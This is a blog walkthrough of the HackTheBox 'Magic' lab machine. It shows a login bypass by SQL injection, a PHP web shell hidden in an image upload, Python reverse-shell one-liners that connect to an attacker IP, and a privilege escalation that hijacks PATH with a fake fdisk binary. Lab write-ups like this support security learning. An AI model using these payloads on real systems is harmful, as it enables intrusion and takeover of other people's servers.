Magic HacktheBox Walkthrough

Posted by on
  

Table Of Content

1. Portscan
2. USER
    2.1 Web Enumeration
    2.2 SQL Injection
    2.3 File Upload
    2.4 Initial Shell
    2.5 User Flag
3. ROOT

Scripts/Tools Used:

1. nmap: https://nmap.org/download.html
2. Burpsuite: https://portswigger.net/burp/communitydownload
3. pspy64: https://github.com/DominicBreuker/pspy

1. Portscan

The nmap portscan result shows two ports are open:

2. USER

2.1 WEB Enumeration

I started my enumeration from port 80 as there is nothing else interesting found in portscan. The web shows random floating pictures.
The information I gathered from source code and gobuster are:
1. login.php page.
2. /images/uploads.

2.2 SQLI

The login.php portal is vulnerable to a simple SQL injection attack. It can be easily bypassed with the simple payload.


username: ' OR '1'='1
password: ' OR '1'='1
 

2.3 File Upload

After bypassing the login page, There comes an image upload portal. Then with the help of burp suite, I tried to inject malicious PHP code inside the image file.
The portal only allows files to upload with an extension like img.jgp, img.png, img.jpeg.

To make the attack successful I make the file name grandhack.php.png and remove the magic bytes of the image file, leaving some of them to maintain the signature of the file. Finally appending the PHP code for command execution.

PHP code :  <?php echo system($_REQUEST['cmd']); ?>

2.4 Initial Shell 

Using nc and python I grab the initial shell as www-data.
http://10.10.10.185/images/uploads/greathack.php.png?python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.15.21",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

2.4 User Flag

Under /var/www/Magic, I found the db.php5 file that contains the database credentials of theseus.
su

With mysqldump I dumped the database content and found the valid password of theseus.And then simply switched to theseus using .

3 ROOT

Linpeash.sh revealed that sysinfo can be used to escalate privileges.


So whenever sysinfo is executed by theseus other commands like fdisk and lshw are also get executed with root privileges.

so, In order to exploit this, I created a fdisk file in the tmp/labstore/ directory. the code inside fdisk is the same as we used to take our initial shell.
code inside fdisk:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.15.21",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Then, I made it executable with chmod.

Now, It's important that the custom-created fdisk file is picked instead of default one. In order to achieve this, I changed the PATH variable and point to the current directory.


And that's how the magic ends.

References:
1. Reverse shell: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
2. mysqldump: https://www.configserverfirewall.com/mysqladmin/mysqldump-mysql-database-backup-examples/
Thanks for reading.
Hacker,Developer,Human

Comments

Post a Comment